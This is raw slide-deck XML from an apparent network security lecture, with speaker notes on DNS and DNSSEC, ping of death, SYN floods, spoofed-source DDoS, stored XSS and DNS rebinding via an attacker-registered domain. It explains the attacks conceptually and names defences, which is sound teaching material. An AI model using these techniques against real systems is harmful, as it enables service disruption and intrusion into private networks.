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3"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="773" r:id="rId4"/>
    <p:sldId id="699" r:id="rId5"/>
    <p:sldId id="754" r:id="rId6"/>
    <p:sldId id="738" r:id="rId7"/>
    <p:sldId id="739" r:id="rId8"/>
    <p:sldId id="741" r:id="rId9"/>
    <p:sldId id="743" r:id="rId10"/>
    <p:sldId id="744" r:id="rId11"/>
    <p:sldId id="745" r:id="rId12"/>
    <p:sldId id="746" r:id="rId13"/>
    <p:sldId id="747" r:id="rId14"/>
    <p:sldId id="774" r:id="rId15"/>
    <p:sldId id="749" r:id="rId16"/>
    <p:sldId id="750" r:id="rId17"/>
    <p:sldId id="751" r:id="rId18"/>
    <p:sldId id="775" r:id="rId19"/>
    <p:sldId id="776" r:id="rId20"/>
    <p:sldId id="752" r:id="rId21"/>
    <p:sldId id="753" r:id="rId22"/>
    <p:sldId id="770" r:id="rId23"/>
    <p:sldId id="771" r:id="rId24"/>
    <p:sldId id="755" r:id="rId25"/>
    <p:sldId id="756" r:id="rId26"/>
    <p:sldId id="757" r:id="rId27"/>
    <p:sldId id="758" r:id="rId28"/>
    <p:sldId id="759" r:id="rId29"/>
    <p:sldId id="760" r:id="rId30"/>
    <p:sldId id="761" r:id="rId31"/>
    <p:sldId id="762" r:id="rId32"/>
    <p:sldId id="763" r:id="rId33"/>
    <p:sldId id="764" r:id="rId34"/>
    <p:sldId id="765" r:id="rId35"/>
    <p:sldId id="766" r:id="rId36"/>
    <p:sldId id="767" r:id="rId37"/>
    <p:sldId id="768" r:id="rId38"/>
    <p:sldId id="769" r:id="rId39"/>
    <p:sldId id="295" r:id="rId40"/>
    <p:sldId id="296" r:id="rId41"/>
    <p:sldId id="778"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781" r:id="rId67"/>
    <p:sldId id="782" r:id="rId68"/>
    <p:sldId id="783" r:id="rId69"/>
    <p:sldId id="784" r:id="rId70"/>
    <p:sldId id="322" r:id="rId71"/>
    <p:sldId id="323" r:id="rId72"/>
    <p:sldId id="324" r:id="rId73"/>
    <p:sldId id="325" r:id="rId74"/>
    <p:sldId id="326" r:id="rId75"/>
    <p:sldId id="327" r:id="rId76"/>
    <p:sldId id="328" r:id="rId77"/>
    <p:sldId id="329" r:id="rId78"/>
    <p:sldId id="330" r:id="rId79"/>
    <p:sldId id="331" r:id="rId80"/>
    <p:sldId id="779"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1" d="100"/>
          <a:sy n="81" d="100"/>
        </p:scale>
        <p:origin x="75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C2C1-5273-457D-A5D5-6164BC6167E6}" type="datetimeFigureOut">
              <a:rPr lang="en-PK" smtClean="0"/>
              <a:t>27/11/2024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218F6-6405-4637-A922-5F08CED9BE54}" type="slidenum">
              <a:rPr lang="en-PK" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-PK"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="225421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Domain_Name_System" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Time_to_live"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ipedia.org/wiki/Domain_name" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Denial-of-service_attack"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Same_origin_policy" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Spamming" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Client-side_scripting" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Adobe_Flash" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/IP_address" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Web_page" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Private_network" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/JavaScript"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List_of_HTTP_headers" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Dynamic_DNS" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/HTTP"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Nameserver" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Noscript" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/DNS_rebinding" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/NoScript" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/OpenDNS" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Firefox"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Nameserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a device that work on behalf of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> a pool of local clients. Trudy can really can act as one of those local clients. Often </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Nameserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> don’t have access restrictions.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218599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Akamai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> which monitors the state of the internet.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FD506D70-4FDC-464B-81DF-79C5C4B28E23}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1685179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can send a ping packet and it is formed in such a way that it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> will create a kernel bug and crash the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>SYN Flood used to work in the old days.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Patches for ping of death are also available. SYN Cookies are a defense of SYN Flood.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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124004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Simply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> send enough network to saturate the network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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178452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Access link for the victim will be saturated.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 top of that the attacker will also spoof the IP source address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396405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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="287552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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18168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can stop most of these attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FD506D70-4FDC-464B-81DF-79C5C4B28E23}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1674153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CDN is simply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> distributing the Content server at multiple location so you will get higher bandwidth at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0"/>
              <a:t>multiple locations</a:t>
            </a:r>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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163005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Normally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> network doesn’t check the source IP, so we can fake the IP</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266892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20:33:40</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20:33:40</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20:33:40</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20:33:40</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20:33:41</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20:33:41</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20:33:42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>--------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>The comment is injected as HTML  and the browser assumes the  script tag is trusted and executes  it as part of the page like any  normal          script           tag   The doEvil function is just a  placeholder for arbitrary attacker  controlled code.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20:33:42</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854218F6-6405-4637-A922-5F08CED9BE54}" type="slidenum">
              <a:rPr lang="en-PK" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-PK"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3261011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20:33:42</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20:33:42</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20:33:42</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20:33:43</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20:33:43</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>--------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>The example we just saw is an  example of what is called a Stored  XSS. This is so called because  the attack vector is stored on the  server.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20:33:43</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>--------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Can also send IM, show up as a  comment on Facebook/blogs etc. Shared  on reddit/facebook. A successful  exploit on Facebook for example  might repost the malicious link so  that all the followers also see the  link.</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NS = Name Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RRSIG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> = To check that the information in the record was correct</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DS = Delegation Server record is used by one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NameServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to tell you the PK of another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>NameServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FD506D70-4FDC-464B-81DF-79C5C4B28E23}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="865362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54218F6-6405-4637-A922-5F08CED9BE54}" type="slidenum">
              <a:rPr lang="en-PK" smtClean="0"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-PK"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3659926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20:33:45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>--------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Can also send IM, show up as a  comment on Facebook/blogs etc. Shared  on reddit/facebook. A successful  exploit on Facebook for example  might repost the malicious link so  that all the followers also see the  link.</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Example:If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a query for fake.example.com is made, NSEC/NSEC3 can confirm that no such record exists in example.com.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-PK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{854218F6-6405-4637-A922-5F08CED9BE54}" type="slidenum">
              <a:rPr lang="en-PK" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-PK"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9447683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13413-0D94-5790-9A84-DFC5139C7DA9}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Notes Placeholder">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5364202-A339-7082-684E-B51AA7C28779}"/>
              </a:ext>
            </a:extLst>
          </p:cNvP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25301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b="1" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DNS rebinding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> is a form of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3" tooltip="Computer security"/>
              </a:rPr>
              <a:t>computer attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. In this attack, a malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4" tooltip="Web page"/>
              </a:rPr>
              <a:t>web page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> causes visitors to run a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId5" tooltip="Client-side scripting"/>
              </a:rPr>
              <a:t>client-side script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> that attacks machines elsewhere on the network. In theory, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId6" tooltip="Same origin policy"/>
              </a:rPr>
              <a:t>same-origin policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>prevents this from happening: client-side scripts are only allowed to access content on the same host that served the script. Comparing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId7" tooltip="Domain name"/>
              </a:rPr>
              <a:t>domain names</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> is an essential part of forcing this policy, so DNS rebinding circumvents this protection by abusing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId8" tooltip="Domain Name System"/>
              </a:rPr>
              <a:t>Domain Name System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (DNS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>This attack can be used to breach a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId9" tooltip="Private network"/>
              </a:rPr>
              <a:t>private network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> by causing the victim's web browser to access machines at private </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId10" tooltip="IP address"/>
              </a:rPr>
              <a:t>IP addresses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> and returning the results to the attacker. It can also be used to leverage the victim machine for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId11" tooltip="Spamming"/>
              </a:rPr>
              <a:t>spamming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId12" tooltip="Denial-of-service attack"/>
              </a:rPr>
              <a:t>distributed denial-of-service attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> and other malicious activities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The attacker registers a domain (such as attacker.com) and delegates it to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId8" tooltip="Domain Name System"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
